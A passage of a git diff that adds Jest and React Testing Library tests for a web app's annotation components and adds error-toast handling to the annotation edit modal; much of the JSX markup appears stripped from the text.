expect(screen.queryByText('appAnnotation.editModal.title')).not.toBeInTheDocument() + }) + + it('should display query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Look for query and answer content + expect(screen.getByText('Test query')).toBeInTheDocument() + expect(screen.getByText('Test answer')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should handle different query and answer content', () => { + // Arrange + const props = { + ...defaultProps, + query: 'Custom query content', + answer: 'Custom answer content', + } + + // Act + render() + + // Assert - Check content is displayed + expect(screen.getByText('Custom query content')).toBeInTheDocument() + expect(screen.getByText('Custom answer content')).toBeInTheDocument() + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert - Remove option should be present (using pattern) + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should enable editing for query and answer sections', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Edit links should be visible (using text content) + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(2) + }) + + it('should show remove option when annotationId is provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + + it('should save content when edited', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Find and click edit link for query + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + // Find textarea and enter new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + // Click save button + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'New query content', + answer: 'Test answer', + message_id: undefined, + }) + }) + }) + + // API Calls + describe('API Calls', () => { + it('should call addAnnotation when saving new annotation', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock the API response + mockAddAnnotation.mockResolvedValueOnce({ + id: 'test-annotation-id', + account: { name: 'Test User' }, + }) + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockAddAnnotation).toHaveBeenCalledWith('test-app-id', { + question: 'Updated query', + answer: 'Test answer', + message_id: undefined, + }) + }) + + it('should call editAnnotation when updating existing annotation', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + expect(mockEditAnnotation).toHaveBeenCalledWith( + 'test-app-id', + 'test-annotation-id', + { + message_id: 'test-message-id', + question: 'Modified query', + answer: 'Test answer', + }, + ) + }) + }) + + // State Management + describe('State Management', () => { + it('should initialize with closed confirm modal', () => { + // Arrange + const props = { ...defaultProps } + + // Act + render() + + // Assert - Confirm dialog should not be visible initially + expect(screen.queryByText('appDebug.feature.annotation.removeConfirm')).not.toBeInTheDocument() + }) + + it('should show confirm modal when remove is clicked', async () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + const user = userEvent.setup() + + // Act + render() + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Assert - Confirmation dialog should appear + expect(screen.getByText('appDebug.feature.annotation.removeConfirm')).toBeInTheDocument() + }) + + it('should call onRemove when removal is confirmed', async () => { + // Arrange + const mockOnRemove = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + onRemove: mockOnRemove, + } + const user = userEvent.setup() + + // Act + render() + + // Click remove + await user.click(screen.getByText('appAnnotation.editModal.removeThisCache')) + + // Click confirm + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + // Assert + expect(mockOnRemove).toHaveBeenCalled() + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle empty query and answer', () => { + // Arrange + const props = { + ...defaultProps, + query: '', + answer: '', + } + + // Act + render() + + // Assert + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should handle very long content', () => { + // Arrange + const longQuery = 'Q'.repeat(1000) + const longAnswer = 'A'.repeat(1000) + const props = { + ...defaultProps, + query: longQuery, + answer: longAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(longQuery)).toBeInTheDocument() + expect(screen.getByText(longAnswer)).toBeInTheDocument() + }) + + it('should handle special characters in content', () => { + // Arrange + const specialQuery = 'Query with & < > " \' characters' + const specialAnswer = 'Answer with & < > " \' characters' + const props = { + ...defaultProps, + query: specialQuery, + answer: specialAnswer, + } + + // Act + render() + + // Assert + expect(screen.getByText(specialQuery)).toBeInTheDocument() + expect(screen.getByText(specialAnswer)).toBeInTheDocument() + }) + + it('should handle onlyEditResponse prop', () => { + // Arrange + const props = { + ...defaultProps, + onlyEditResponse: true, + } + + // Act + render() + + // Assert - Query should be readonly, answer should be editable + const editLinks = screen.queryAllByText(/common\.operation\.edit/i) + expect(editLinks).toHaveLength(1) // Only answer should have edit button + }) + }) + + // Error Handling (CRITICAL for coverage) + describe('Error Handling', () => { + it('should show error toast and skip callbacks when addAnnotation fails', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + // Mock API failure + mockAddAnnotation.mockRejectedValueOnce(new Error('API Error')) + + // Act + render() + + // Find and click edit link for query + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + // Find textarea and enter new content + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + // Click save button + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'API Error', + type: 'error', + }) + }) + expect(mockOnAdded).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show fallback error message when addAnnotation error has no message', async () => { + // Arrange + const mockOnAdded = jest.fn() + const props = { + ...defaultProps, + onAdded: mockOnAdded, + } + const user = userEvent.setup() + + mockAddAnnotation.mockRejectedValueOnce({}) + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'New query content') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionFailed', + type: 'error', + }) + }) + expect(mockOnAdded).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show error toast and skip callbacks when editAnnotation fails', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + // Mock API failure + mockEditAnnotation.mockRejectedValueOnce(new Error('API Error')) + + // Act + render() + + // Edit query content + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'API Error', + type: 'error', + }) + }) + expect(mockOnEdited).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + + it('should show fallback error message when editAnnotation error is not an Error instance', async () => { + // Arrange + const mockOnEdited = jest.fn() + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + messageId: 'test-message-id', + onEdited: mockOnEdited, + } + const user = userEvent.setup() + + mockEditAnnotation.mockRejectedValueOnce('oops') + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Modified query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionFailed', + type: 'error', + }) + }) + expect(mockOnEdited).not.toHaveBeenCalled() + + // Verify edit mode remains open (textarea should still be visible) + expect(screen.getByRole('textbox')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'common.operation.save' })).toBeInTheDocument() + }) + }) + + // Billing & Plan Features + describe('Billing & Plan Features', () => { + it('should show createdAt time when provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + createdAt: 1701381000, // 2023-12-01 10:30:00 + } + + // Act + render() + + // Assert - Check that the formatted time appears somewhere in the component + const container = screen.getByRole('dialog') + expect(container).toHaveTextContent('2023-12-01 10:30:00') + }) + + it('should not show createdAt when not provided', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + // createdAt is undefined + } + + // Act + render() + + // Assert - Should not contain any timestamp + const container = screen.getByRole('dialog') + expect(container).not.toHaveTextContent('2023-12-01 10:30:00') + }) + + it('should display remove section when annotationId exists', () => { + // Arrange + const props = { + ...defaultProps, + annotationId: 'test-annotation-id', + } + + // Act + render() + + // Assert - Should have remove functionality + expect(screen.getByText('appAnnotation.editModal.removeThisCache')).toBeInTheDocument() + }) + }) + + // Toast Notifications (Success) + describe('Toast Notifications', () => { + it('should show success notification when save operation completes', async () => { + // Arrange + const props = { ...defaultProps } + const user = userEvent.setup() + + // Act + render() + + const editLinks = screen.getAllByText(/common\.operation\.edit/i) + await user.click(editLinks[0]) + + const textarea = screen.getByRole('textbox') + await user.clear(textarea) + await user.type(textarea, 'Updated query') + + const saveButton = screen.getByRole('button', { name: 'common.operation.save' }) + await user.click(saveButton) + + // Assert + await waitFor(() => { + expect(toastNotifySpy).toHaveBeenCalledWith({ + message: 'common.api.actionSuccess', + type: 'success', + }) + }) + }) + }) + + // React.memo Performance Testing + describe('React.memo Performance', () => { + it('should not re-render when props are the same', () => { + // Arrange + const props = { ...defaultProps } + const { rerender } = render() + + // Act - Re-render with same props + rerender() + + // Assert - Component should still be visible (no errors thrown) + expect(screen.getByText('appAnnotation.editModal.title')).toBeInTheDocument() + }) + + it('should re-render when props change', () => { + // Arrange + const props = { ...defaultProps } + const { rerender } = render() + + // Act - Re-render with different props + const newProps = { ...props, query: 'New query content' } + rerender() + + // Assert - Should show new content + expect(screen.getByText('New query content')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/app/annotation/edit-annotation-modal/index.tsx b/web/app/components/app/annotation/edit-annotation-modal/index.tsx index 2961ce393c..6172a215e4 100644 --- a/web/app/components/app/annotation/edit-annotation-modal/index.tsx +++ b/web/app/components/app/annotation/edit-annotation-modal/index.tsx @@ -53,27 +53,39 @@ const EditAnnotationModal: FC = ({ postQuery = editedContent else postAnswer = editedContent - if (!isAdd) { - await editAnnotation(appId, annotationId, { - message_id: messageId, - question: postQuery, - answer: postAnswer, - }) - onEdited(postQuery, postAnswer) - } - else { - const res: any = await addAnnotation(appId, { - question: postQuery, - answer: postAnswer, - message_id: messageId, - }) - onAdded(res.id, res.account?.name, postQuery, postAnswer) - } + try { + if (!isAdd) { + await editAnnotation(appId, annotationId, { + message_id: messageId, + question: postQuery, + answer: postAnswer, + }) + onEdited(postQuery, postAnswer) + } + else { + const res = await addAnnotation(appId, { + question: postQuery, + answer: postAnswer, + message_id: messageId, + }) + onAdded(res.id, res.account?.name ?? '', postQuery, postAnswer) + } - Toast.notify({ - message: t('common.api.actionSuccess') as string, - type: 'success', - }) + Toast.notify({ + message: t('common.api.actionSuccess') as string, + type: 'success', + }) + } + catch (error) { + const fallbackMessage = t('common.api.actionFailed') as string + const message = error instanceof Error && error.message ? error.message : fallbackMessage + Toast.notify({ + message, + type: 'error', + }) + // Re-throw to preserve edit mode behavior for UI components + throw error + } } const [showModal, setShowModal] = useState(false) diff --git a/web/app/components/app/annotation/empty-element.spec.tsx b/web/app/components/app/annotation/empty-element.spec.tsx new file mode 100644 index 0000000000..56ebb96121 --- /dev/null +++ b/web/app/components/app/annotation/empty-element.spec.tsx @@ -0,0 +1,13 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import EmptyElement from './empty-element' + +describe('EmptyElement', () => { + it('should render the empty state copy and supporting icon', () => { + const { container } = render() + + expect(screen.getByText('appAnnotation.noData.title')).toBeInTheDocument() + expect(screen.getByText('appAnnotation.noData.description')).toBeInTheDocument() + expect(container.querySelector('svg')).not.toBeNull() + }) +}) diff --git a/web/app/components/app/annotation/filter.spec.tsx b/web/app/components/app/annotation/filter.spec.tsx new file mode 100644 index 0000000000..6260ff7668 --- /dev/null +++ b/web/app/components/app/annotation/filter.spec.tsx @@ -0,0 +1,70 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import Filter, { type QueryParam } from './filter' +import useSWR from 'swr' + +jest.mock('swr', () => ({ + __esModule: true, + default: jest.fn(), +})) + +jest.mock('@/service/log', () => ({ + fetchAnnotationsCount: jest.fn(), +})) + +const mockUseSWR = useSWR as unknown as jest.Mock + +describe('Filter', () => { + const appId = 'app-1' + const childContent = 'child-content' + + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should render nothing until annotation count is fetched', () => { + mockUseSWR.mockReturnValue({ data: undefined }) + + const { container } = render( + +
{childContent}
+
, + ) + + expect(container.firstChild).toBeNull() + expect(mockUseSWR).toHaveBeenCalledWith( + { url: `/apps/${appId}/annotations/count` }, + expect.any(Function), + ) + }) + + it('should propagate keyword changes and clearing behavior', () => { + mockUseSWR.mockReturnValue({ data: { total: 20 } }) + const queryParams: QueryParam = { keyword: 'prefill' } + const setQueryParams = jest.fn() + + const { container } = render( + +
{childContent}
+
, + ) + + const input = screen.getByPlaceholderText('common.operation.search') as HTMLInputElement + fireEvent.change(input, { target: { value: 'updated' } }) + expect(setQueryParams).toHaveBeenCalledWith({ ...queryParams, keyword: 'updated' }) + + const clearButton = input.parentElement?.querySelector('div.cursor-pointer') as HTMLElement + fireEvent.click(clearButton) + expect(setQueryParams).toHaveBeenCalledWith({ ...queryParams, keyword: '' }) + + expect(container).toHaveTextContent(childContent) + }) +}) diff --git a/web/app/components/app/annotation/header-opts/index.spec.tsx b/web/app/components/app/annotation/header-opts/index.spec.tsx new file mode 100644 index 0000000000..3d8a1fd4ef --- /dev/null +++ b/web/app/components/app/annotation/header-opts/index.spec.tsx @@ -0,0 +1,439 @@ +import * as React from 'react' +import { render, screen, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import type { ComponentProps } from 'react' +import HeaderOptions from './index' +import I18NContext from '@/context/i18n' +import { LanguagesSupported } from '@/i18n-config/language' +import type { AnnotationItemBasic } from '../type' +import { clearAllAnnotations, fetchExportAnnotationList } from '@/service/annotation' + +jest.mock('@headlessui/react', () => { + type PopoverContextValue = { open: boolean; setOpen: (open: boolean) => void } + type MenuContextValue = { open: boolean; setOpen: (open: boolean) => void } + const PopoverContext = React.createContext(null) + const MenuContext = React.createContext(null) + + const Popover = ({ children }: { children: React.ReactNode | ((props: { open: boolean }) => React.ReactNode) }) => { + const [open, setOpen] = React.useState(false) + const value = React.useMemo(() => ({ open, setOpen }), [open]) + return ( + + {typeof children === 'function' ? children({ open }) : children} + + ) + } + + const PopoverButton = React.forwardRef(({ onClick, children, ...props }: { onClick?: () => void; children?: React.ReactNode }, ref: React.Ref) => { + const context = React.useContext(PopoverContext) + const handleClick = () => { + context?.setOpen(!context.open) + onClick?.() + } + return ( + + ) + }) + + const PopoverPanel = React.forwardRef(({ children, ...props }: { children: React.ReactNode | ((props: { close: () => void }) => React.ReactNode) }, ref: React.Ref) => { + const context = React.useContext(PopoverContext) + if (!context?.open) return null + const content = typeof children === 'function' ? children({ close: () => context.setOpen(false) }) : children + return ( +
+ {content} +
+ ) + }) + + const Menu = ({ children }: { children: React.ReactNode }) => { + const [open, setOpen] = React.useState(false) + const value = React.useMemo(() => ({ open, setOpen }), [open]) + return ( + + {children} + + ) + } + + const MenuButton = ({ onClick, children, ...props }: { onClick?: () => void; children?: React.ReactNode }) => { + const context = React.useContext(MenuContext) + const handleClick = () => { + context?.setOpen(!context.open) + onClick?.() + } + return ( + + ) + } + + const MenuItems = ({ children, ...props }: { children: React.ReactNode }) => { + const context = React.useContext(MenuContext) + if (!context?.open) return null + return ( +
+ {children} +
+ ) + } + + return { + Dialog: ({ open, children, className }: { open?: boolean; children: React.ReactNode; className?: string }) => { + if (open === false) return null + return ( +
+ {children} +
+ ) + }, + DialogBackdrop: ({ children, className, onClick }: { children?: React.ReactNode; className?: string; onClick?: () => void }) => ( +
+ {children} +
+ ), + DialogPanel: ({ children, className, ...props }: { children: React.ReactNode; className?: string }) => ( +
+ {children} +
+ ), + DialogTitle: ({ children, className, ...props }: { children: React.ReactNode; className?: string }) => ( +
+ {children} +
+ ), + Popover, + PopoverButton, + PopoverPanel, + Menu, + MenuButton, + MenuItems, + Transition: ({ show = true, children }: { show?: boolean; children: React.ReactNode }) => (show ? <>{children} : null), + TransitionChild: ({ children }: { children: React.ReactNode }) => <>{children}, + } +}) + +let lastCSVDownloaderProps: Record | undefined +const mockCSVDownloader = jest.fn(({ children, ...props }) => { + lastCSVDownloaderProps = props + return ( +
+ {children} +
+ ) +}) + +jest.mock('react-papaparse', () => ({ + useCSVDownloader: () => ({ + CSVDownloader: (props: any) => mockCSVDownloader(props), + Type: { Link: 'link' }, + }), +})) + +jest.mock('@/service/annotation', () => ({ + fetchExportAnnotationList: jest.fn(), + clearAllAnnotations: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: () => ({ + plan: { + usage: { annotatedResponse: 0 }, + total: { annotatedResponse: 10 }, + }, + enableBilling: false, + }), +})) + +jest.mock('@/app/components/billing/annotation-full', () => ({ + __esModule: true, + default: () =>
, +})) + +type HeaderOptionsProps = ComponentProps + +const renderComponent = ( + props: Partial = {}, + locale: string = LanguagesSupported[0] as string, +) => { + const defaultProps: HeaderOptionsProps = { + appId: 'test-app-id', + onAdd: jest.fn(), + onAdded: jest.fn(), + controlUpdateList: 0, + ...props, + } + + return render( + + + , + ) +} + +const openOperationsPopover = async (user: ReturnType) => { + const trigger = document.querySelector('button.btn.btn-secondary') as HTMLButtonElement + expect(trigger).toBeTruthy() + await user.click(trigger) +} + +const expandExportMenu = async (user: ReturnType) => { + await openOperationsPopover(user) + const exportLabel = await screen.findByText('appAnnotation.table.header.bulkExport') + const exportButton = exportLabel.closest('button') as HTMLButtonElement + expect(exportButton).toBeTruthy() + await user.click(exportButton) +} + +const getExportButtons = async () => { + const csvLabel = await screen.findByText('CSV') + const jsonLabel = await screen.findByText('JSONL') + const csvButton = csvLabel.closest('button') as HTMLButtonElement + const jsonButton = jsonLabel.closest('button') as HTMLButtonElement + expect(csvButton).toBeTruthy() + expect(jsonButton).toBeTruthy() + return { + csvButton, + jsonButton, + } +} + +const clickOperationAction = async ( + user: ReturnType, + translationKey: string, +) => { + const label = await screen.findByText(translationKey) + const button = label.closest('button') as HTMLButtonElement + expect(button).toBeTruthy() + await user.click(button) +} + +const mockAnnotations: AnnotationItemBasic[] = [ + { + question: 'Question 1', + answer: 'Answer 1', + }, +] + +const mockedFetchAnnotations = jest.mocked(fetchExportAnnotationList) +const mockedClearAllAnnotations = jest.mocked(clearAllAnnotations) + +describe('HeaderOptions', () => { + beforeEach(() => { + jest.clearAllMocks() + jest.useRealTimers() + mockCSVDownloader.mockClear() + lastCSVDownloaderProps = undefined + mockedFetchAnnotations.mockResolvedValue({ data: [] }) + }) + + it('should fetch annotations on mount and render enabled export actions when data exist', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + renderComponent() + + await waitFor(() => { + expect(mockedFetchAnnotations).toHaveBeenCalledWith('test-app-id') + }) + + await expandExportMenu(user) + + const { csvButton, jsonButton } = await getExportButtons() + + expect(csvButton).not.toBeDisabled() + expect(jsonButton).not.toBeDisabled() + + await waitFor(() => { + expect(lastCSVDownloaderProps).toMatchObject({ + bom: true, + filename: 'annotations-en-US', + type: 'link', + data: [ + ['Question', 'Answer'], + ['Question 1', 'Answer 1'], + ], + }) + }) + }) + + it('should disable export actions when there are no annotations', async () => { + const user = userEvent.setup() + renderComponent() + + await expandExportMenu(user) + + const { csvButton, jsonButton } = await getExportButtons() + + expect(csvButton).toBeDisabled() + expect(jsonButton).toBeDisabled() + + expect(lastCSVDownloaderProps).toMatchObject({ + data: [['Question', 'Answer']], + }) + }) + + it('should open the add annotation modal and forward the onAdd callback', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + const onAdd = jest.fn().mockResolvedValue(undefined) + renderComponent({ onAdd }) + + await waitFor(() => expect(mockedFetchAnnotations).toHaveBeenCalled()) + + await user.click( + screen.getByRole('button', { name: 'appAnnotation.table.header.addAnnotation' }), + ) + + await screen.findByText('appAnnotation.addModal.title') + const questionInput = screen.getByPlaceholderText('appAnnotation.addModal.queryPlaceholder') + const answerInput = screen.getByPlaceholderText('appAnnotation.addModal.answerPlaceholder') + + await user.type(questionInput, 'Integration question') + await user.type(answerInput, 'Integration answer') + await user.click(screen.getByRole('button', { name: 'common.operation.add' })) + + await waitFor(() => { + expect(onAdd).toHaveBeenCalledWith({ + question: 'Integration question', + answer: 'Integration answer', + }) + }) + }) + + it('should allow bulk import through the batch modal', async () => { + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.bulkImport') + + expect(await screen.findByText('appAnnotation.batchModal.title')).toBeInTheDocument() + await user.click( + screen.getByRole('button', { name: 'appAnnotation.batchModal.cancel' }), + ) + expect(onAdded).not.toHaveBeenCalled() + }) + + it('should trigger JSONL download with locale-specific filename', async () => { + mockedFetchAnnotations.mockResolvedValue({ data: mockAnnotations }) + const user = userEvent.setup() + const originalCreateElement = document.createElement.bind(document) + const anchor = originalCreateElement('a') as HTMLAnchorElement + const clickSpy = jest.spyOn(anchor, 'click').mockImplementation(jest.fn()) + const createElementSpy = jest + .spyOn(document, 'createElement') + .mockImplementation((tagName: Parameters[0]) => { + if (tagName === 'a') + return anchor + return originalCreateElement(tagName) + }) + const objectURLSpy = jest + .spyOn(URL, 'createObjectURL') + .mockReturnValue('blob://mock-url') + const revokeSpy = jest.spyOn(URL, 'revokeObjectURL').mockImplementation(jest.fn()) + + renderComponent({}, LanguagesSupported[1] as string) + + await expandExportMenu(user) + + await waitFor(() => expect(mockCSVDownloader).toHaveBeenCalled()) + + const { jsonButton } = await getExportButtons() + await user.click(jsonButton) + + expect(createElementSpy).toHaveBeenCalled() + expect(anchor.download).toBe(`annotations-${LanguagesSupported[1]}.jsonl`) + expect(clickSpy).toHaveBeenCalled() + expect(revokeSpy).toHaveBeenCalledWith('blob://mock-url') + + const blobArg = objectURLSpy.mock.calls[0][0] as Blob + await expect(blobArg.text()).resolves.toContain('"Question 1"') + + clickSpy.mockRestore() + createElementSpy.mockRestore() + objectURLSpy.mockRestore() + revokeSpy.mockRestore() + }) + + it('should clear all annotations when confirmation succeeds', async () => { + mockedClearAllAnnotations.mockResolvedValue(undefined) + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.clearAll') + + await screen.findByText('appAnnotation.table.header.clearAllConfirm') + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + await waitFor(() => { + expect(mockedClearAllAnnotations).toHaveBeenCalledWith('test-app-id') + expect(onAdded).toHaveBeenCalled() + }) + }) + + it('should handle clear all failures gracefully', async () => { + const consoleSpy = jest.spyOn(console, 'error').mockImplementation(jest.fn()) + mockedClearAllAnnotations.mockRejectedValue(new Error('network')) + const user = userEvent.setup() + const onAdded = jest.fn() + renderComponent({ onAdded }) + + await openOperationsPopover(user) + await clickOperationAction(user, 'appAnnotation.table.header.clearAll') + await screen.findByText('appAnnotation.table.header.clearAllConfirm') + const confirmButton = screen.getByRole('button', { name: 'common.operation.confirm' }) + await user.click(confirmButton) + + await waitFor(() => { + expect(mockedClearAllAnnotations).toHaveBeenCalled() + expect(onAdded).not.toHaveBeenCalled() + expect(consoleSpy).toHaveBeenCalled() + }) + + consoleSpy.mockRestore() + }) + + it('should refetch annotations when controlUpdateList changes', async () => { + const view = renderComponent({ controlUpdateList: 0 }) + + await waitFor(() => expect(mockedFetchAnnotations).toHaveBeenCalledTimes(1)) + + view.rerender( + + + , + ) + + await waitFor(() => expect(mockedFetchAnnotations).toHaveBeenCalledTimes(2)) + }) +}) diff --git a/web/app/components/app/annotation/header-opts/index.tsx b/web/app/components/app/annotation/header-opts/index.tsx index 024f75867c..5f8ef658e7 100644 --- a/web/app/components/app/annotation/header-opts/index.tsx +++ b/web/app/components/app/annotation/header-opts/index.tsx @@ -17,7 +17,7 @@ import Button from '../../../base/button' import AddAnnotationModal from '../add-annotation-modal' import type { AnnotationItemBasic } from '../type' import BatchAddModal from '../batch-add-annotation-modal' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import CustomPopover from '@/app/components/base/popover' import { FileDownload02, FilePlus02 } from '@/app/components/base/icons/src/vender/line/files' import { ChevronRight } from '@/app/components/base/icons/src/vender/line/arrows' diff --git a/web/app/components/app/annotation/index.spec.tsx b/web/app/components/app/annotation/index.spec.tsx new file mode 100644 index 0000000000..4971f5173c --- /dev/null +++ b/web/app/components/app/annotation/index.spec.tsx @@ -0,0 +1,233 @@ +import React from 'react' +import { act, fireEvent, render, screen, waitFor } from '@testing-library/react' +import Annotation from './index' +import type { AnnotationItem } from './type' +import { JobStatus } from './type' +import { type App, AppModeEnum } from '@/types/app' +import { + addAnnotation, + delAnnotation, + delAnnotations, + fetchAnnotationConfig, + fetchAnnotationList, + queryAnnotationJobStatus, +} from '@/service/annotation' +import { useProviderContext } from '@/context/provider-context' +import Toast from '@/app/components/base/toast' + +jest.mock('@/app/components/base/toast', () => ({ + __esModule: true, + default: { notify: jest.fn() }, +})) + +jest.mock('ahooks', () => ({ + useDebounce: (value: any) => value, +})) + +jest.mock('@/service/annotation', () => ({ + addAnnotation: jest.fn(), + delAnnotation: jest.fn(), + delAnnotations: jest.fn(), + fetchAnnotationConfig: jest.fn(), + editAnnotation: jest.fn(), + fetchAnnotationList: jest.fn(), + queryAnnotationJobStatus: jest.fn(), + updateAnnotationScore: jest.fn(), + updateAnnotationStatus: jest.fn(), +})) + +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('./filter', () => ({ children }: { children: React.ReactNode }) => ( +
{children}
+)) + +jest.mock('./empty-element', () => () =>
) + +jest.mock('./header-opts', () => (props: any) => ( +
+ +
+)) + +let latestListProps: any + +jest.mock('./list', () => (props: any) => { + latestListProps = props + if (!props.list.length) + return
+ return ( +
+ + + +
+ ) +}) + +jest.mock('./view-annotation-modal', () => (props: any) => { + if (!props.isShow) + return null + return ( +
+
{props.item.question}
+ + +
+ ) +}) + +jest.mock('@/app/components/base/pagination', () => () =>
) +jest.mock('@/app/components/base/loading', () => () =>
) +jest.mock('@/app/components/base/features/new-feature-panel/annotation-reply/config-param-modal', () => (props: any) => props.isShow ?
: null) +jest.mock('@/app/components/billing/annotation-full/modal', () => (props: any) => props.show ?
